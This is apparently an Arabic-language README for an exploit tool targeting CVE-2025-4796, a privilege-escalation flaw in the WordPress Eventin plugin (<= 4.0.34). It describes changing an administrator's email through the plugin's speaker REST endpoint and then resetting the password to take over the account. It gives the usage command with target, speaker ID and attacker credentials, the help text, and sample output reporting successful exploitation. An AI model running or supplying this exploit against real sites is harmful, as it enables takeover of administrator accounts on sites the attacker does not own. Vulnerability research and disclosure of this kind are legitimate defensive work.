
Eventin <= 4.0.34 - تصعيد امتيازات عبر مستخدم مصادَق (مساهم+) عن طريق تغيير البريد الإلكتروني للمستخدم/الاستيلاء على الحساب
Eventin <= 4.0.34 - تصعيد امتيازات لمستخدم مصادق (بصلاحية Contributor+) عبر تغيير البريد الإلكتروني للمستخدم/الاستيلاء على الحساب
يوثق هذا المستودع ثغرة تصعيد امتيازات في إضافة Eventin الخاصة بووردبريس (<= 4.0.34) تسمح لمستخدم مصادق بصلاحيات Contributor+ أو أعلى بتغيير عناوين البريد الإلكتروني لأي مستخدم عبر واجهة برمجة تطبيقات تحديث المتحدث (speaker) في الإضافة. من خلال تغيير بريد مدير الموقع، يمكن للمهاجم تفعيل إعادة تعيين كلمة المرور والاستيلاء على الحساب.
المكوّن المعرّض: إضافة Eventin لووردبريس (Eventin\Speaker\Api\SpeakerController::update_item)
الإصدارات المتأثرة: <= 4.0.34
CVE: CVE-2025-4796
CVSS: 8.8 (عالي)
التثبيتات النشطة: 10,000+
لا تتحقق Eventin بشكل صحيح من هوية أو صلاحية المتصل قبل تحديث تفاصيل المتحدث/المستخدم (وتحديدًا البريد الإلكتروني). يمكن للمهاجم الذي تمت مصادقته كمساهم (أو أعلى) تغيير عنوان البريد الإلكتروني لمستخدمين آخرين — بمن فيهم مديرو الموقع — باستخدام نقطة نهاية REST التابعة للإضافة:
بمجرد تغيير البريد إلى عنوان يتحكم به المهاجم، يمكن استخدام سير عمل إعادة تعيين كلمة المرور القياسي في ووردبريس للاستيلاء على الحساب.
اسم الملف: CVE-2025-4796.py
يقوم هذا السكربت بأتمتة الخطوات التالية:
/wp-json/eventin/v2/speakers/<speaker_id> لتحديث البريد الإلكتروني للمتحدث.المتطلبات:
التثبيت:
pip install requests
شغّل السكربت من سطر الأوامر:
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
اعرض مساعدة السكربت:
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
من: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/